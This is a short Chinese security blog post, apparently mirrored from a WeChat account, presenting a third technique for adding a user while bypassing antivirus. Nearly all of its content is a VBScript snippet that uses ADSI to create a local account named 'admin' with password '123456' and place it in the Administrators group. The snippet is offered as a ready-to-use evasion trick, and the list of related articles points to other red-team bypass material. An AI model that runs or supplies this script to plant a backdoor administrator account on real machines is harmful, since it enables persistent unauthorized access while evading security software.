专栏首页鸿鹄实验室bypass AV添加用户(三)

bypass AV添加用户(三)

如题。之前发过两次绕过AV添加用户的方法,今天发第三种...

绕过:

源码如下:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","admin")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

注意密码复杂性,致力于一篇文章解决一个问题。

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-08-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 域渗透不用进程窃取如何横向 Bypass Psexec AV 拿到域控?

    大家好,这里是 渗透攻击红队 的第 63 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • 利用USB橡皮鸭在目标机器上启动Empire或Meterpreter会话

    今天我将教大家如何使用Rubber Ducky在渗透中建立Empire或Meterpreter会话连接。然而对于Ducky而言,想要完成大多数现实场景中的USB...

    FB客服
  • 研究人员如何使用Injector实现Windows下的内存注入

    Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。

    FB客服
  • 文件上传的一个骚操作(低权限+BypassAV)

    虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

    HACK学习
  • 总结到目前为止发现的所有EDR绕过方法

    所有关注攻击性安全社区的人都会在过去两年中一次又一次地遇到Userland hooking, Syscalls, P/Invoke/D-Invoke等术语。我自...

    用户2202688
  • 实战 | 记一次Bypass国外杀毒的主机渗透经历

    这个好,直接jboss,一般可先尝试弱口令后台部署war包,后门文件进行压缩,改名为“.war”:

    HACK学习
  • Windows用户自查:微软紧急更新修复Meltdown和Spectre CPU漏洞

    1月3日深夜,微软发布了针对Meltdown和Specter的系统安全更新,而两个安全漏洞影响了几乎所有自1995年以来发布的CPU(不止Intel)。根据微软...

    FB客服
  • freebsd添加用户

    pw是一个用来创建、删除、修改、显示用户和组的命令行工具。它还有系统用户和组文件编辑器的功能。

    用户1168904
  • mysql 添加用户

    命令方式的.注意每行后边都跟个 ; 表示一个命令语句结束. 格式:grant select on 数据库.* to 用户名@登录主机 identified by...

    全栈程序员站长
  • 给我一个SQL注入我能干翻你内网

    大家好,这里是 渗透攻击红队 的第 48 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新

    渗透攻击红队
  • Antimalware Scan Interface (AMSI)—反恶意软件扫描接口的绕过

    反恶意软件扫描接口(AMSI)是MicrosoftWindows保护系统,旨在保护计算机免受通过脚本语言(例如PowerShell,VBScript,JavaS...

    洛米唯熊
  • 用shell添加用户

    调试添加用户的脚本 # sh -x useradd.sh alex + '[' 1 -lt 1 ']' + id alex + useradd alex + ...

    零月
  • 读书笔记《antivirus-bypass-techniques》

    本文是基本图书《Antivirus Bypass Techniques: Learn practical techniques and tactics ...

    鸿鹄实验室
  • Excel的IYQ钓鱼

    1、操作系统:windows7 2、microsoft office版本:office 2010

    洛米唯熊
  • MongoDB 3添加用户

    经查,原因是在mongodb版本3以上已经弃用了adduser,改成createuser了。

    py3study
  • 从外网代码审计到三层内网各种漏洞拿到域控

    大家好,这里是 渗透攻击红队 的第 58 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • HTTP-revshell:能绕过AMSI的PowerShell代理感知型反向Shell

    HTTP-revshell是一个能够绕过AMSI的PowerShell代理感知型反向Shell,这款工具转为红队研究人员以及渗透测试人员设计,能够通过HTTP/...

    FB客服
  • 史上最强内网渗透知识点总结

    文章内容没谈 snmp 利用,可以去乌云等社区获取,没有后续内网持久化,日志处理等内容。

    信安之路
  • 浅谈个人对一个高性能红队建设的一些想法

    本人有幸参加了一些线下的攻防演练,比较熟悉攻防对抗的流程和手法,和很多师傅们在线下也有过深入学习交流,同时也产生了一些自己的想法。

    陈殷

扫码关注云+社区

领取腾讯云代金券